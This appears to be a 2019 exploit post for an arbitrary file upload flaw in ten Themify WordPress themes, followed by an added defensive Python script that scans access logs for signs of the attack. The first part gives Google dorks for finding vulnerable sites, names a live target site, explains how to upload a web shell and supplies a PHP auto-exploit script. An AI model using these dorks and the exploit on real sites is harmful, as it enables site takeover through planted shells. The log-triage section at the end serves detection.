10 Themes Wordpress Vuln Arbitrary File Upload | Themify
Thursday, 17 October 2019
Dork:
inurl:"/wp-content/themes/elemin/"
inurl:"/wp-content/themes/bloggie/"
inurl:"/wp-content/themes/tisa/"
inurl:"/wp-content/themes/funki/"
inurl:"/wp-content/themes/pinboard/"
inurl:"/wp-content/themes/folo/"
inurl:"/wp-content/themes/grido/"
inurl:"/wp-content/themes/suco/"
inurl:"/wp-content/themes/ithemes2/"
inurl:"/wp-content/themes/basic/"
Exploit: /themes/<theme name>/themify/themify-ajax.php
Example: utpd.com/wp-content/themes/basic/themify/themify-ajax.php
Vulnerable? The site shows a blank page.
Use an online CSRF form, or a .html one is fine too; postfile = Filedata
Shell = /wp-content/themes/<theme name>/uploads/shellname.php
Live utpd.com
AutoExploit Using PHP:
<?php
$uploadfile = "inc0vers.php";
$ch = curl_init("http://127.0.0.1/wp-content/themes/elemin/themify/themify-ajax.php?upload=1");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
GoodLuck!
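For site owners, the two request paths named in this post (themify-ajax.php and the theme's uploads/ directory) are what to look for in web server access logs. The following is an added example, not part of the original post: the function name `triage`, the combined log format and the sample lines are assumptions, and the log lines are constructed with documentation IP addresses.

```python
import re

# Constructed sample lines in combined log format (documentation IPs, not real traffic).
SAMPLE_LOG = '''\
203.0.113.7 - - [17/Oct/2019:10:01:02 +0000] "POST /wp-content/themes/elemin/themify/themify-ajax.php?upload=1 HTTP/1.1" 200 0 "-" "curl/7.58.0"
203.0.113.7 - - [17/Oct/2019:10:01:05 +0000] "GET /wp-content/themes/elemin/uploads/x.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.9 - - [17/Oct/2019:10:02:00 +0000] "GET /wp-content/themes/basic/style.css HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
198.51.100.4 - - [17/Oct/2019:10:03:00 +0000] "GET /wp-content/themes/basic/themify/themify-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
'''

# client IP, method, request URI, status (assumes Apache/Nginx combined format)
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+) [^"]*" (\d{3}) ')
# The AJAX handler path from the post, under any theme directory
AJAX = re.compile(r'^/wp-content/themes/([^/]+)/themify/themify-ajax\.php(?:\?|$)', re.I)
# Any PHP-like script requested from a theme's uploads/ directory
SCRIPT = re.compile(r'^/wp-content/themes/([^/]+)/uploads/[^?]*\.(?:php\d?|phtml)(?:\?|$)', re.I)

def triage(log_text):
    """Return (kind, client_ip, theme, http_status) tuples in log order."""
    findings, posted = [], set()
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # not a combined-format request line
        ip, method, uri, status = m.groups()
        ajax, script = AJAX.match(uri), SCRIPT.match(uri)
        if ajax:
            theme = ajax.group(1).lower()
            if method == "POST":
                posted.add(theme)  # remember themes that received an upload POST
                findings.append(("upload-post", ip, theme, status))
            else:
                findings.append(("endpoint-probe", ip, theme, status))
        elif script:
            theme = script.group(1).lower()
            # A script hit after a POST to the same theme is the strongest signal
            kind = "script-after-upload" if theme in posted else "script-in-uploads"
            findings.append((kind, ip, theme, status))
    return findings

if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(*finding)
```

Any `script-after-upload` or `script-in-uploads` finding with a 200 status warrants inspecting the theme's uploads/ directory on disk for PHP files.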